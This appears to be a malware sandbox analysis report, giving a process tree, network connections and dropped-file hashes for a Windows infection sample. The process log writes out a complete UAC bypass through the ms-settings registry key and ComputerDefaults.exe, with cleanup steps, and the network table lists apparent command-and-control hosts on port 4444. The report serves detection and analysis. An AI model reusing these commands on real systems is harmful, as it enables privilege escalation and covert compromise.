/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4982.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4982.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4982.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\4982.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6074.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6074.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\6074.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\6074.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| AT | 185.244.212.106:2227 | tcp | |
| US | 8.8.8.8:53 | 106.212.244.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beastsband.com | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 8.8.8.8:53 | 150.133.209.85.in-addr.arpa | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| N/A | 224.0.0.251:5353 | udp |
Files
memory/1604-0-0x00007FFCC2293000-0x00007FFCC2295000-memory.dmp
memory/1604-1-0x0000000000D40000-0x0000000000D48000-memory.dmp
memory/1604-2-0x00007FFCC2290000-0x00007FFCC2D51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
| MD5 | cfbd38c30f1100b5213c9dd008b6e883 |
| SHA1 | 03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73 |
| SHA256 | 25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5 |
| SHA512 | a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04 |
memory/1876-13-0x0000000000BD0000-0x0000000001030000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
| MD5 | 9c433a245d7737ca7fa17490e460f14e |
| SHA1 | 31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9 |
| SHA256 | 0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7 |
| SHA512 | edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95 |
memory/5112-23-0x0000000000933000-0x0000000000934000-memory.dmp
memory/1316-24-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1316-27-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1316-28-0x0000000000910000-0x0000000000942000-memory.dmp
memory/1316-29-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1316-31-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1604-32-0x00007FFCC2293000-0x00007FFCC2295000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
| MD5 | b73ecb016b35d5b7acb91125924525e5 |
| SHA1 | 37fe45c0a85900d869a41f996dd19949f78c4ec4 |
| SHA256 | b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d |
| SHA512 | 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d |
memory/792-45-0x0000000035850000-0x0000000035860000-memory.dmp
memory/1876-46-0x0000000000BD0000-0x0000000001030000-memory.dmp
memory/1876-47-0x0000000000BD0000-0x0000000001030000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
| MD5 | 892d97db961fa0d6481aa27c21e86a69 |
| SHA1 | 1f5b0f6c77f5f7815421444acf2bdd456da67403 |
| SHA256 | c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719 |
| SHA512 | 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241 |
memory/1604-56-0x00007FFCC2290000-0x00007FFCC2D51000-memory.dmp
memory/1316-57-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1876-59-0x00000000082C0000-0x0000000008326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8540.vbs
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
memory/1876-61-0x0000000000BD0000-0x0000000001030000-memory.dmp
memory/1876-64-0x0000000008770000-0x000000000886A000-memory.dmp
memory/1876-65-0x0000000008A40000-0x0000000008C02000-memory.dmp
memory/1876-66-0x00000000088C0000-0x0000000008910000-memory.dmp
memory/1876-67-0x0000000008990000-0x0000000008A06000-memory.dmp
memory/1876-68-0x0000000009140000-0x000000000966C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4982.vbs
| MD5 | 34b33b5a437e20d03d79b62a797dfe99 |
| SHA1 | 9b57b598a7e9d66157a05a44bc7c097bf5486e6c |
| SHA256 | f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1 |
| SHA512 | 757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c |
memory/1876-70-0x0000000008CA0000-0x0000000008CBE000-memory.dmp
memory/1876-72-0x0000000008D90000-0x0000000008E2C000-memory.dmp
memory/1876-80-0x0000000008E30000-0x00000000090B0000-memory.dmp
memory/1876-101-0x00000000090C0000-0x00000000090CC000-memory.dmp
memory/1876-102-0x0000000009E60000-0x000000000A404000-memory.dmp
memory/1876-103-0x00000000099C0000-0x0000000009A52000-memory.dmp
memory/1876-104-0x0000000009990000-0x000000000999A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6074.vbs
| MD5 | bb8cfb89bce8af7384447115a115fb23 |
| SHA1 | 6a0e728f4953128db9db52474ae5608ecee9c9c3 |
| SHA256 | d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485 |
| SHA512 | d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553 |
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
| MD5 | 6543901753c73d70d039b793a4eb11f9 |
| SHA1 | e3b483ddf13c97a2088f38de32df96c73d883cc4 |
| SHA256 | 4411e1640670d9cc0ff1b6e0e4ed7edad47c1528ccb4837ecbd5c42fe6e48222 |
| SHA512 | aa2d775669bce8b1ac3c27fd7b39ffc1fd737820a3bc2c43d144ce7d3ccda571281fb595d998bcaf9033ea03b9c794c2b2a8f870019f2f08d78c550717b86ca0 |